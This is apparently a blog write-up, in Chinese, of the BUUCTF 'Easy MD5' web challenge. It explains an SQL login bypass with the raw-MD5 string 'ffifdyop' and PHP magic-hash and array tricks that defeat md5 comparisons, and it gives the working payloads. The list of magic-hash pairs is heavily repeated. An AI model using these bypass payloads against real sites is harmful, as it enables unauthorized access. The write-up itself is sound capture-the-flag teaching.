【BUUCTF-Web】 Easy MD5

题目页面

  先做抓包处理

在响应头里发现

 

密码被进行了md5加密,password可通过“password = 1 or 1 = 1”进行绕过

可令该SQL语句返回true,与万能密码的原理相同。

像这样的字符串有:

129581926211651571912466741651878684928

ffifdyop

在输入框中输入ffifdyop提交,进入新页面

 查看源代码,发现php代码

 

在这里,需要我们构造两个字符串a和b,二者需不相同,但md5值却相同。想到了md5碰撞和数组绕过。

关于md5碰撞,利用了PHP在使用“!=”、“==”比较哈希字符串时,会将0e开头的字符串当做0处理,因此如果字符串的md5值为0e开头,则可以进行md5碰撞,使PHP认为它们是相等的。

因为这个是字符串之间进行比较,想要绕过这个弱比较只能用0e的方式。 在PHP中”0e”判断为科学计数法,0e123就是0的10123次方 不难推出:0e123456789==0e1 // 因为0的任意次方都为0 不过有一个注意点:

在0e后面不能含有字母!!!
否则判断为False

数组绕过,主要利用了md5函数不能处理数组,当传入数组时,经md5加密后,都为null,相等。

md5后为0E开头的字符串

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

payload:?a[]=1&b[]=2

也可以:?a=s878926199a&b=s155964671a

进入新页面

 

与前一个不同的是,首先这里使用了POST传参,其次对字符串进行比较的“!=”、“==” 换成了 “!==”、“===”,后者对值和类型进行比较,且不会进行类型的强制转化。

payload:param1[]=1&param2[]=2

得到flag

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值